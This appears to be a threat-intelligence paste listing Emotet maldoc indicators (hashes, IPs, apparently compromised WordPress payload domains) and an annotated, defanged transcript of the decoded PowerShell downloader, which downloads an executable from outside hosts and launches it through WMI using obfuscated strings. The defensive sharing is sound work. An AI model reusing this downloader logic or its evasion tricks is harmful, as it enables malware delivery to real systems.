paladin316

Emotet_Doc_out_2020-08-09_14_12.txt

Aug 9th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (malicious document samples — the Emotet maldocs themselves, not the downloaded EXE):
  4.  
  5. fb395af7fd0491664d78c7785fea4911db3975e4a091bc5eddc50b0f3ac0fa70
  6. 15be7667cc3b8d6445b3b4c245f2befdcf7a96e438a771828ca1ed6c12682670
  7. 56aea8dd28bb9f893ec49cf3e5bd73eb7dafad62fb12c5f1431b94e2bbd02986
  8. c60d19c1d07964063c3fc9afa7a3ea1d438eea8702ac3157866a7fb7a5188af6
  9. b672f5abfd74991cf8744157fc0642f98c9e09c872d637548b932582b74cc4b5
  10. cede25e4801348361a934627a1928932140f56021e2f05723e90924a37a2501c
  11. 3ec975d212b214553bac033787cb72d8310c493b5261f76b8ba3b5421b9f31e1
  12. 7b7b33a7dbd6566a73bbab5bdb8a4fb6f5aa2655095adc97b72e22b5f09a8f43
  13. 0731aa8c16ac6d1cd66d19ed7059f68747efdde349b8dad3151b981cac519407
  14. d95a095f1cf9bdfaa08a2f69b690d0a9ab88aeb363b878d2fc63e4cf35f7e055
  15. 6ada89dcdbab52f4e6a27eda3a1b47a604b2e57b5ebe4f502a172431535a45c4
  16. d3c7b17eb10b73fa3e2c519f2e78fbf3d2fc0ceca12fa1eb7b6d2f2b550ee3ec
  17. 820da17a8eaff8c82447bb2f72f514fa4c888a082a33c65e33c1333eca90c39d
  18. 73a3928db928299dd820e0673e47b3ba4173c06c8c22c488567d1999d11f9033
  19. f43b44e247e702710aebe9ba02ffca511b4dcc85f9e09baf16e21cdcb979894e
  20. 65fb2416ca1ef5a5608ec7a020d3d3cf348b0521b65fdf537196f704e82b522b
  21. 851d6a216a5ec8b775ddf5115ccf0c8dfe054e62e5300fd06c00cdd6baa0ad31
  22. 4bcbb791a6e7d82ef06350e13ea403604b25e2c73afac036748a8c9277a108c6
  23. 5fd98ef53003b4fab6d28929bf2c15e32709841ae3b1e4b0e33298e2c08f4d2e
  24. 3df37575881de839c3081ff758ae6a8934f896042b207f3cbd1a093682054f9a
  25. 048934d8125d2f5bc8c0e4ee1efd9e76070c1396a48ec3da60331ae4e0184454
  26. 01cc906c67b7436474d8fce8e59fe79f0eef205a2b295a0c1d80b27415dc7162
  27. 82b25f195db0033b5d1705ff3d18a635a7bfdae1a8b5ef2043f98b4dfedbd74f
  28. 0f51bd6a3a308265260a1e3b6b77c6886284ad6cfbdf187e65f120e3c834c0ee
  29. 6c25dc35fcd4cd4a6eb507f1766e45f8fec7d5520b055e955f5ddb4e126992de
  30. 047cdf9813da040d37e8458e3ce5f2147172c8ae77b7cf1a866e2e95f04b734a
  31. 723cb4ac47080e46d544823dc316da29065687e855c74b5d5231a426ef4779ed
  32. e0cc86bcee2fc0083454ada1ccbdf90a186feb91671fbb7f47e3a0bb25f490ae
  33. 64ae75176c5209a4580904f8abb0325b3bcf67c934861febea1b64232c4efaa0
  34. 445f2dd9223b8d46bfc36d19ddadabfebee56b41cd963badb1767ba5f8e8c67e
  35. 102266027b14b1295af406042f9b99a74c506535cd93bd0ba856950cf0f539b3
  36. 20cace41504cccaaa0cf3e251afb734ca463b422f87d08c3075233abcc604d82
  37. de2c0d155018df39b6034698ea9c4b08c4abba8900d1fc8c386b299d49abe792
  38.  
  39.  
  40. IPs (presumably the domains' resolutions at collection time; 104.18.x/104.31.x/172.67.x and 23.x are shared CDN address space, so these are low-fidelity for blocking — pivot on the domains and URL paths below instead):
  41. 104.18.60.10
  42. 104.18.61.10
  43. 104.31.82.74
  44. 104.31.83.74
  45. 172.67.142.151
  46. 172.67.221.115
  47. 23.198.171.168
  48. 23.74.50.62
  49. 68.66.224.31
  50.  
  51. Domains (payload hosts; four of the five URL paths below sit under /wp-admin/, so these look like compromised WordPress sites rather than attacker-registered infrastructure):
  52.  
  53. csmbuildersllc.com
  54. deservingveterans.com
  55. eldiosstore.com
  56. luckyme247.com
  57. vandamebuilders.com
  58.  
  59.  
  60. hxxp://eldiosstore.com/css/qpfv_e_y3lk0sp6i/
  61. hxxp://luckyme247.com/wp-admin/qawpw_v1_ghe1wmzxzc/
  62. hxxp://vandamebuilders.com/wp-admin/e2ky_18j8_wn4v/
  63. hxxp://deservingveterans.com/wp-admin/fy_4bqe_zu6ew/
  64. hxxp://csmbuildersllc.com/wp-admin/teqvm_n0yai_84/
  65.  
  66.  
  67. Decoded Base64 PowerShell (the downloader stage; URLs defanged to hxxp and the '*' separators apparently replaced by line breaks, so this is not runnable as pasted):
# Analyst transcript of the decoded second-stage PowerShell carried by the Emotet maldoc.
# Annotated for defenders; the code is left byte-for-byte as pasted (defanged, see the
# note on the URL list below). Flow: build a drop path under %USERPROFILE%, try each
# payload URL in turn, and launch the first download that is large enough.
# The many single-use string assignments ($KECNCnmc, $OULKAgdo, $VXZCJfyo, ...) are
# never read again in this snippet -- dead-store noise meant to defeat simple signatures.
$KECNCnmc='BXJMJghb';
# Enable TLS 1.0/1.1/1.2 on the WebClient. The property name is broken up with backtick
# escapes so a plain string match on "SecurityProtocol" does not fire.
[Net.ServicePointManager]::"SecUrITyp`R`oto`col" = 'tls12, tls11, tls';
# Drop path: %USERPROFILE%\543.exe. The numeric name likely varies per sample, so hunt on
# any <digits>.exe written directly under the profile root rather than on "543".
$VOZLMopw = '543';
$OULKAgdo='NICIAfce';
$IAMPLbal=$env:userprofile+'\'+$VOZLMopw+'.exe';
$VXZCJfyo='IETDKzhh';
# New-Object Net.WebClient, with the cmdlet name assembled by concatenation.
$VGSWPiko=&('new'+'-ob'+'je'+'ct') nEt.wEBCLiEnt;
# Payload URL list. In the live payload the five URLs are one '*'-separated string,
# hence the Split on [char]42 ('*'). In this paste the separators appear to have been
# replaced by line breaks and the scheme defanged to hxxp, so as shown the Split yields a
# single unusable element -- intentional, this is an IOC record, not a working dropper.
$EGNLMfyc='hxxp://eldiosstore.com/css/qpfv_e_y3lk0sp6i/
hxxp://luckyme247.com/wp-admin/qawpw_v1_ghe1wmzxzc/
hxxp://vandamebuilders.com/wp-admin/e2ky_18j8_wn4v/
hxxp://deservingveterans.com/wp-admin/fy_4bqe_zu6ew/
hxxp://csmbuildersllc.com/wp-admin/teqvm_n0yai_84/'."S`plit"([char]42);
$YTBGZzto='ZPIGGbig';
# Try each URL in order: WebClient.DownloadFile(url, drop path). Any failure (dead host,
# takedown, DNS/proxy block) is swallowed by the empty catch at the end and the next URL
# is tried, so sinkholing a single domain does not stop the infection -- block all five.
foreach($YUQXWfmi in $EGNLMfyc){try{$VGSWPiko."dOwnL`O`Adfi`LE"($YUQXWfmi, $IAMPLbal);
$ILLGLmqu='ZJYCBtae';
# Only run the file if it is at least 28766 bytes -- presumably to skip error pages or
# empty responses from a cleaned-up host. Execution goes through WMI Win32_Process.Create
# instead of Start-Process / the call operator. Detection caveat: in practice the new
# process is parented by WmiPrvSE.exe, not by the calling powershell.exe, so parent/child
# chain rules keyed on Office -> powershell.exe -> <drop>.exe will miss this launch; alert
# on Win32_Process.Create from PowerShell and on executables spawned from %USERPROFILE%\.
If ((.('Get'+'-'+'Item') $IAMPLbal)."leN`G`TH" -ge 28766) {([wmiclass]'win32_Process')."c`ReA`TE"($IAMPLbal);
$OYAJUrzy='BXSUDjyv';
# Stop after the first successful launch; remaining URLs are never contacted.
break;
$SHOPFptf='XOPGCqlr'}}catch{}}$ICROMojs='HOUSDxhm'
  87.  